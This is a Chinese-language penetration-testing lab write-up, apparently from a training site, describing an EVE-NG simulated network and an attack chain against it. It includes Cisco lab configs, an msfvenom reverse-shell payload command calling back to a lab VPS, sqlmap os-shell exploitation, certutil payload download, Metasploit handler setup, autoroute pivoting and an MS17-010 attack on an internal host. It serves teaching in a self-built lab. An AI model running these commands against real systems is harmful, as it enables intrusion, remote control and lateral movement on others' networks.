1. 首页
  2. 渗透测试

eve模拟真实环境的靶场渗透

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

作者 Catty

拓扑图

eve模拟真实环境的靶场渗透

本实验模拟公网,左边kali通过sqlmap攻击右边Server_5并且os-shell,再通过反弹shell在MSF当中建立会话,再以Server_5为跳板机攻击内网当中另外一台没有映射服务的Win2003。

实验所用到的机器:

攻击机(紫色部分):kali(内网IP:192.168.117.241)

被攻击方(黄色部分):

Server_5(内网IP:172.16.192.88),映射了HTTP到公网上

WinServer(是一台2003,内网IP:172.16.192.4)

附加:Frp_Server(是一台EVE里面的kali,模拟公网VPS:202.100.1.3)

环境搭建:

紫色部分

SW1:(也可以不用划分vlan,默认都在vlan 1当中)

SW1(config)#vlan 10

SW1(config)#interface e0/0

SW1(config-if)#switchport mode access

SW1(config-if)#switchport access vlan 10

SW1(config)#int e0/1

SW1(config-if)#switchport mode access

SW1(config-if)#switchport access vlan 10

R3:

R3(config)#int e0/0

R3(config-if)#ip address 192.168.117.254 255.255.255.0

R3(config-if)#ip nat inside  //配置NAT inside

R3(config-if)#no shutdown

R3(config)#int e0/1

R3(config-if)#ip address 12.0.0.1 255.255.255.0

R3(config-if)#no shutdown

R3(config-if)#ip nat outside  //配置NAT outside

R3(config)#access-list 11 permit 192.168.117.0 0.0.0.255 //匹配流量

R3(config)#ip nat inside source list 11 interface Ethernet0/1 overload

这里讲究点是应该有一台DHCP服务器的,但是我内存不够了,带不动,所以直接在R3上面把DHCP服务也起了

ip dhcp excluded-address 192.168.117.254

!

ip dhcp pool kali

 network 192.168.241.0 255.255.255.0

 default-router 192.168.241.254

中间部分:

 ISP:

ISP(config)#int e0/0

ISP(config-if)#ip address 12.0.0.2 255.255.255.0

ISP(config-if)#no shutdown

ISP(config)#int e0/2

ISP(config-if)#ip address 202.100.1.2 255.255.255.0

ISP(config-if)#no shutdown

ISP(config)#int e0/1

ISP(config-if)#ip address 23.0.0.2 255.255.255.0

ISP(config-if)#no shutdown

ISP(config)#int loopback 0 //建立环回口测试网络情况

ISP(config-if)#ip address 2.2.2.2 255.255.255.255

     黄色部分:

 SW2:

SW2(config)#vlan 10

SW2(config)#interface e0/0

SW2(config-if)#switchport mode access

SW2(config-if)#switchport access vlan 10

SW2(config)#int e0/1

SW2(config-if)#switchport mode access

SW2(config-if)#switchport access vlan 10

SW2(config)#int e0/2

SW2(config-if)#switchport mode access

SW2(config-if)#switchport access vlan 10

 R5:

R5(config)#int e0/0

R5(config-if)#ip address 23.0.0.3

R5(config-if)#ip nat outside

R5(config-if)#no shutdown

R5(config)#int e0/1

R5(config-if)#ip address 172.16.192.254 255.255.255.0

R5(config-if)#no shutdown

R5(config-if)#ip nat inside  //配置NAT outside

R5(config)#access-list 11 permit 172.16.192.0 0.0.0.255 //匹配流量

R5(config)#ip nat inside source list 11 interface Ethernet0/1 overload

R5(config)#ip nat inside source static tcp 172.16.192.88 80 23.0.0.3 80(把Server_5的HTTP服务映射到公网地址的80端口上)

//ISP,R3,R5配置OSPF模拟公网环境

R3(config)#router ospf 100

R3(config-router)# router-id 1.1.1.1

R3(config-router)#passive-interface Ethernet0/0

R3(config-router)#network 12.0.0.0 0.0.0.255 area 0

R5(config)#router ospf 100

R5(config-router)# router-id 3.3.3.3

R5(config-router)#passive-interface Ethernet0/1

R5(config-router)#network 23.0.0.0 0.0.0.255 area 0

ISP(config)#router ospf 100

ISP(config-router)# router-id 2.2.2.2

ISP(config-router)# network 2.2.2.2 0.0.0.0 area 0

ISP(config-router)#network 12.0.0.0 0.0.0.255 area 0

ISP(config-router)#network 23.0.0.0 0.0.0.255 area 0

ISP(config-router)#network 202.100.1.0 0.0.0.255 area 0

测试网络情况:

左边kali(通过dhclient获取地址)

eve模拟真实环境的靶场渗透

访问Server_5,这里做一个DNS解析(本来一开始搭建了一台公网DNS服务器模拟公网映射的,但是运行环境真的顶不住了,所以就删掉了那台设备,直接修改本地hosts文件了)

eve模拟真实环境的靶场渗透

将域名解析到23.0.0.3上面

添加完后记得重启网络服务喔

/etc/init.d/networking restart

访问一下web

eve模拟真实环境的靶场渗透

OK!暂时莫得问题!!!

配置一下中间Frp_Server(202.100.1.3)的地址(图中名字弄错了,这该是的T和R居然在一起!!!)

本来是想用一台ubuntu来作这个frp服务端的,但我的EVE当中刚好有一个kali的镜像,那就不要那么多事了直接用EVE的kali吧

eve模拟真实环境的靶场渗透

添加路由

eve模拟真实环境的靶场渗透

装好frp

eve模拟真实环境的靶场渗透

开启FRP,等待侦听

eve模拟真实环境的靶场渗透

同时生成一个reverse.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=202.100.1.3 LPORT=6000 -f exe > reverse.exe

eve模拟真实环境的靶场渗透

上面的LPORT=6000记得要和你frp客户端(也就是紫色的kali)配置文件当中的remote_port要一样喔

然后在当前文件夹下面开启http服务(待会要用到)

eve模拟真实环境的靶场渗透

OK!!!!至此,中间的FRP服务器已经配置好了(当然,上述的操作你也可以直接在紫色部分的kali当中直接ssh到中间这台服务器上面进行操作,这样子会更好的模拟真实环境当中的VPS效果。我这里为了记录文档就没这么做了)

下面就直接到紫色部分的Kali当中模拟攻击吧!!!(有一点忘记说了,接下来的kali当中你会看到shell的主题经常变,并不是换了一台kali,而是我的~/.zshrc当中主题部分写了”random”)

eve模拟真实环境的靶场渗透
  1. 首先先连接上frp
eve模拟真实环境的靶场渗透
eve模拟真实环境的靶场渗透

此时你会看到远程的frp_server当中有连接提示

eve模拟真实环境的靶场渗透
  1. 使用sqlmap直接对Server_5进行os-shell(这是月师傅SQLMAP课程当中的一台靶机)
  • 2.语句:

python sqlmap.py -u “http://www.dm1.com/inj.aspx?id=1” –dbms mssql –batch –is-dba –os-shell -p id –random-agent

eve模拟真实环境的靶场渗透

那么此时,我需要这台Server_5运行我的一个反弹shell,让他可以和我的kali当中msf建立起会话,这个时候刚刚在frp_server当中启用的一个http服务就起作用了

可以看到,当前的目录路径是在C:\WINDOWS\SYSTEM32

那么,我们可以使用certutil.exe,一般看到成功完成就代表下载下来了,所以我就不dir来查看了

eve模拟真实环境的靶场渗透

然后kali开启msfc

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set LHOST 127.0.0.1

LHOST => 127.0.0.1

msf exploit(multi/handler) > set LPORT 5555  //这里的端口是frpc上面的local端口,记得一定要一样啊

LPORT => 5555

msf exploit(multi/handler) > exploit

接下来在sqlmap的os-shell当中运行reverse.exe

eve模拟真实环境的靶场渗透

MSF当中出现会话

eve模拟真实环境的靶场渗透

此时,因为我知道我还要对内网的一台2003进行渗透,那么就需要添加一下路由了,利用这台Server_5

先挂起会话,这里用post/multi/manage/autoroute

eve模拟真实环境的靶场渗透

那么先进来shell当中看看,这里我是想直接扫描内网存活主机的,但是很容易就卡死了,所以我就直接shell到Server_5当中看arp表了

eve模拟真实环境的靶场渗透

172.16.192.4这台主机,这里因为前面说的扫描卡死了,所以我就没有一开始扫描判断操作系统了,因为我知道这台就是那台2003(这里很粗糙,有太多已知因素)

这里使用(windows/smb/ms17_010_psexec)对目标进行攻击

先把payload改为

eve模拟真实环境的靶场渗透

然后

eve模拟真实环境的靶场渗透
eve模拟真实环境的靶场渗透

查看会话表:

eve模拟真实环境的靶场渗透

(这里之前失败了一次,所以2没了,直接到3了)

OK!!!实验结束。

原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/3453.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息